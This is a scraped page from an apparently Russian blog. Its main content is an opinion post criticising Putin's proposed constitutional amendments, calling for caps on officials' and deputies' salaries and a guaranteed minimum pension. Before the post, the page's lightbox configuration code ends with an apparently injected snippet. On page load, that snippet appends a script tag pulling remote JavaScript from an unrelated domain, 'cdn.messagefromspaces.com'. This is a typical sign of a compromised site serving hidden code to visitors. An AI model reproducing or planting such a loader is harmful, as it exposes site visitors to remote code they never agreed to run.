, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Умерит ли Путин алчность своих чиновников?

11 Фев

В четверг, 13 февраля с. г. Президент Владимир Путин встретится с рабочей группой по поправкам в Конституцию.

Вряд ли Путин решится дополнить статью 93 Конституции указанием на то, что Президент России может быть отрешен от должности единственным источником власти, многонациональным народом, путём референдума за ненадлежащее исполнение обязанностей гаранта Конституции.

Анализ дискуссий по поправкам удручает.

В СМИ, лица, называющие себя экспертами, рассуждают  о необходимости упомянуть в Конституции Бога,  объявить Путина «верховным правителем», а также ввести пожизненное сенаторство.

Яблоко" вместе с ведущими https://echo.msk.ru/blog/boris_vis/2584772-echo/?utm_source=grf-eng&utm_medium=partner&utm_campaign=giraff.io  российскими юристами в области конституционного права, ссылаясь на зарубежный опыт, предлагает  увеличить с 450 до 650 человек количество депутатов Госдумы.

При этом не учитывается то, что увеличение депутатов на 200 человек, непосильная ноша для госбюджета. Сегодня депутату выплачивают зарплату в 400−600 тыс. руб.  ежемесячно, и на обслуживание каждого в месяц расходуется  по 1,5 млн. руб. бюджетных средств.

Нет никаких оснований для увеличения численности и судей Конституционного  суда с 19 до 21 человека.

Анализ решений Конституционного суда РФ,  даёт основания полагать, что и действующий состав судей доказал свою неспособность в деле установления власти Конституции и правосудия в стране. Поэтому правильно, что Путин уменьшает его численность и  делает его экспертным учреждением по оценке законопроектов.

Мне представляется, что Путин предложил очень робкие изменения в Конституцию России, касающиеся его назначенцев, а также защиты прав и свобод россиян.

Например, не  сделал ограничений для лиц либо их близких родственников (жена, муж, дети), имеющих имущество (недвижимость, счета в банках и т. д.) за границей, но взявшихся осуществлять государственную власть.

Предложив Конституционно узаконить, что минимальный  размер оплаты труда не может быть ниже прожиточного уровня трудоспособного населения, не связал его с зарплатой чиновников, что сейчас получают в 100−200 раз выше, чем миллионы работающих россиян.

Иначе, как дикостью нельзя назвать тот факт, что министры в России получают зарплату в два раза превышающую зарплату министров США.

Это какую же надо иметь совесть, чтобы получать такие деньги, зная, что миллионы россиян живут за чертой бедности?

Директора крупнейших https://migrantvisa.ru/zarplata/srednjaja-zarplata-v-kitae   предприятий Китая получают в год меньше, чем наш министр финансов получает за месяц.

Окружение Путина убедило его в том, что иначе, без зарплат, выше, чем у министров Европы и США, в правительство не набрать «настоящих специалистов». Но жизнь показала насколько они оказались неспособными.

Счетная палата негативно https://www.bfm.ru/news/435872?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews  оценила работу правительства Медведева

Помните, что советовал бывший премьер — министр Дмитрий Анатольевич Медведев?

-Идите в бизнес!

Но в бизнесе они оказались невостребованными.

Сам Дмитрий Анатольевич и его бывшие подчиненные уже благополучно трудоустроены в том же государственном секторе и депутатском корпусе.

Бюджетные средства получать привычнее.

Алчность лиц, желающих обогатиться при осуществлении государственной власти, и руководстве госпредприятиями, может  умерить только запись в Конституции России:   «Зарплата депутатов, министров и иных бюджетников не может превышать 10−15 минимальных размеров оплаты труда».

Но в СМИ по поводу такого предложения, тишина.

Путин, публично заявил о «принципах достойного пенсионного обеспечения», но в предложенных поправках в Конституцию об этом ничего не говорится.

Запамятовали об этом и эксперты и «оппозиция».

Полагаю, что часть 6 статьи 75 следует изложить в следующей редакции: «Основанием достойного пенсионного обеспечения надо считать минимальную пенсию  равную двум прожиточным минимумам трудоспособного населения, а повышение пенсии выше минимальной, определять с учётом трудового стажа».

Поколение людей, родившихся после войны, продолжили дело своих отцов и дедов, поэтому они имеют право на «достойную пенсию».

Иначе смысл всех предложенных поправок, утрачивает своё назначение.

Если на предстоящем совещании Путин не дополнит свои поправки, а Федеральное собрание узаконит только то, что изложено в предложенном Путиным проекте закона о поправке к Конституции, то вряд ли окажется много желающих  за такой закон голосовать.

Индексацию пенсий государство обязано делать и без указания об этом в Конституции России.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.